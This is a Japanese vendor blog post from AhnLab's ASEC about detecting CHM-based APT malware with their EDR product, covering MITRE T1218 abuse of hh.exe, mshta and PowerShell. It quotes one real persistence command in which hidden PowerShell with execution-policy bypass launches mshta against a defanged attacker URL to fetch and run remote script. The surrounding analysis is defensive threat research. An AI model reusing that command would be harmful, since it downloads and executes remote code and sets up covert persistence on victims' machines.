Posted By muhan , 2023年 March 29日

EDR を活用した CHM マルウェアの追跡

AhnLab Security Emergency response Center (ASEC)は最近、CHM(Compiled HTML Help File)を利用した APT 攻撃の事例を公開した。

https://asec.ahnlab.com/jp/49471/

CHM は HTML 形式のヘルプファイルであり、HTML ファイルを内部に含んでいるため、攻撃者は悪意のあるスクリプトコードを HTML に挿入することができる。挿入されたスクリプトは OS のデフォルト実行プログラムである hh.exe を通して実行される。このように攻撃者が署名されていたり、OS にデフォルトとしてインストールされているプログラムを通してマルウェアを実行する技法を MITRE ATT&CK では T1218 (System Binary Proxy Execution)と命名した。MITRE では、攻撃者が T1218 技法を利用してマルウェアを実行する場合、署名されたバイナリもしくは MS デフォルトプログラムでマルウェアが実行されるため、プロセスおよびシグネチャベースの検知を簡単に回避することができると紹介している。

今回 ASEC で確認した CHM マルウェアは mshta.exe を通して PowerShell を実行する不正なスクリプト([図2])を攻撃者サーバーからダウンロードして実行する。

[図2]で最終的に実行される PowerShell スクリプトは、攻撃者の C&C サーバーからコマンドの実行および持続性維持のためのレジストリ Run キーにコマンドを登録する。

レジストリ Run キーの登録コマンド(持続性の維持)

c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 361881 2.2.2.2 || mshta hxxp://shacc[.]kr/skin/product/1.html

以下の[図3]は AhnLab EDR(Endpoint Detection and Response)製品で見られる、メールの添付ファイル形式で実行された CHM 脅威のプロセスツリー情報である。

AhnLab EDR 製品では CHM タイプのマルウェアの脅威についての振る舞い情報記録と検知を行っている。そのため、EDR 運営担当者は EDR の履歴検索を通して、社内インフラに CHM タイプのマルウェア関連の脅威があるかを確認することができる。

CHM 脅威記録の確認方法：イベント→EDR 振る舞い→期間設定→EDR 脅威検索(hh.exe)

[図4] AhnLab EDR 振る舞い履歴確認(hh.exe が mshta プロセス生成検知)

以下は AhnLab EDR 解析画面で確認できる CHM 関連の脅威情報である。

[MITRE ATT&CK 情報]

今回確認された CHM マルウェアの脅威は、最終的に PowerShell 形態のバックドアが実行され、持続性維持のための自動実行レジストリ Run キー登録の振る舞いを実行する。EDR 運営担当者は、EDR を通して[図5]のように、攻撃者の　 C&C サーバーアドレス情報と[図6]の自動実行レジストリ Run キー登録情報を確認し、脅威を取り除くことができる。

また、EDR コンソールの[解析] – [脅威]タブで検知された脅威について[図7]のように「対応する」ボタンをタッチすることで処置も可能である。この機能はプロセスについての措置をとることができるため、プロセスの終了だけでなく、ファイル収集機能もサポートしている。そして、侵害されたホスト PC についても EDR では[図8]のようにネットワーク隔離措置機能をサポートしており、ラテラルムーブメント(Lateral Movement)および攻撃者コマンドの実行などの追加被害を予防することができる。